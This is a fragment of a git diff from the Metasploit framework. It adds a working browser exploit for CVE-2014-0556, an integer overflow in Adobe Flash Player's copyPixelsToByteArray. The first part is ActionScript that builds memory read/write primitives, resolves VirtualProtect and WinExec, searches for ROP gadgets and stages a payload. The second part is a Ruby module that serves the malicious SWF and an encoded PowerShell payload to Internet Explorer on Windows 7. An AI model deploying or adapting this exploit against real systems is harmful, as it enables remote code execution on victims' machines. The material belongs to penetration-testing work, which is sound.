vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 16, 0xffffffff) + byte_write(uv[i][0] + 4, byte_read(uv[i][0] - 0x1000 + 8)) + byte_write(uv[i][0]) + + var flash:uint = base(vtable) + var winmm:uint = module("winmm.dll", flash) + var kernel32:uint = module("kernel32.dll", winmm) + var virtualprotect:uint = procedure("VirtualProtect", kernel32) + var winexec:uint = procedure("WinExec", kernel32) + var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash) + var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash) + + byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable + byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main + byte_write(0, "\x89\x03", false) // mov [ebx], eax + byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret + + byte_write(buffer + 0x100, payload, true) + byte_write(buffer + 0x20070, xchgeaxespret) + byte_write(buffer + 0x20000, xchgeaxesiret) + byte_write(0, virtualprotect) + + // VirtualProtect + byte_write(0, winexec) + byte_write(0, buffer + 0x30000) + byte_write(0, 0x1000) + byte_write(0, 0x40) + byte_write(0, buffer + 0x80) + + // WinExec + byte_write(0, buffer + 0x30000) + byte_write(0, buffer + 0x100) + byte_write(0) + + byte_write(main, buffer + 0x20000) + this.toString() + } + + private function vector_write(addr:uint, value:uint = 0):void + { + addr > uv[i][0] ? uv[i][(addr - uv[i][0]) / 4 - 2] = value : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1] = value + } + + private function vector_read(addr:uint):uint + { + return addr > uv[i][0] ? uv[i][(addr - uv[i][0]) / 4 - 2] : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1] + } + + private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void + { + if (addr) bv[6401].position = addr + if (value is String) { + for (var i:uint; i < value.length; i++) bv[6401].writeByte(value.charCodeAt(i)) + if (zero) bv[6401].writeByte(0) + } else bv[6401].writeUnsignedInt(value) + } + + private function byte_read(addr:uint, type:String = "dword"):uint + { + bv[6401].position = addr + switch(type) { + case "dword": + return bv[6401].readUnsignedInt() + case "word": + return bv[6401].readUnsignedShort() + case "byte": + return bv[6401].readUnsignedByte() + } + return 0 + } + + private function base(addr:uint):uint + { + addr &= 0xffff0000 + while (true) { + if (byte_read(addr) == 0x00905a4d) return addr + addr -= 0x10000 + } + return 0 + } + + private function module(name:String, addr:uint):uint + { + var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1 + while (true) { + var entry:uint = byte_read(iat + (++i) * 0x14 + 12) + if (!entry) throw new Error("FAIL!"); + bv[6401].position = addr + entry + if (bv[6401].readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break + } + return base(byte_read(addr + byte_read(iat + i * 0x14 + 16))) + } + + private function procedure(name:String, addr:uint):uint + { + var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78) + var numberOfNames:uint = byte_read(eat + 0x18) + var addressOfFunctions:uint = addr + byte_read(eat + 0x1c) + var addressOfNames:uint = addr + byte_read(eat + 0x20) + var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24) + for (var i:uint = 0; ; i++) { + var entry:uint = byte_read(addressOfNames + i * 4) + bv[6401].position = addr + entry + if (bv[6401].readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break + } + return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4) + } + + private function gadget(gadget:String, hint:uint, addr:uint):uint + { + var find:uint = 0 + var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50) + var value:uint = parseInt(gadget, 16) + for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break + return addr + i + } + } +} diff --git a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb new file mode 100644 index 0000000000..668fecead7 --- /dev/null +++ b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb @@ -0,0 +1,110 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Adobe Flash Player copyPixelsToByteArray Integer Overflow', + 'Description' => %q{ + This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs + in the copyPixelsToByteArray method from the BitmapData object. The position field of the + destination ByteArray can be used to cause an integer overflow and write contents out of + the ByteArray buffer. This module has been tested successfully on Windows 7 SP1 (32-bit), + IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145 and 14.0.0.125. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Chris Evans', # Vulnerability discovery and 64 bit analysis / exploit + 'Nicolas Joly', # Trigger for 32 bit, according to the project zero ticket + 'hdarwin', # @hdarwin89, 32 bit public exploit, this msf module uses it + 'juan vazquez' # msf module + ], + 'References' => + [ + ['CVE', '2014-0556'], + ['URL', 'http://googleprojectzero.blogspot.com/2014/09/exploiting-cve-2014-0556-in-flash.html'], + ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=46'], + ['URL', 'http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/'], + ['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0556-adobe-flash-player.html'], + ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-21.html'] + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :os_name => OperatingSystems::Match::WINDOWS_7, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.176') }, + :arch => ARCH_X86 + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Sep 23 2014', + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status('Sending SWF...') + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) + return + end + + print_status('Sending HTML...') + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + target_payload = get_payload(cli, target_info) + psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) + b64_payload = Rex::Text.encode_base64(psh_payload) + + html_template = %Q| + + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0556', 'msf.swf') + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end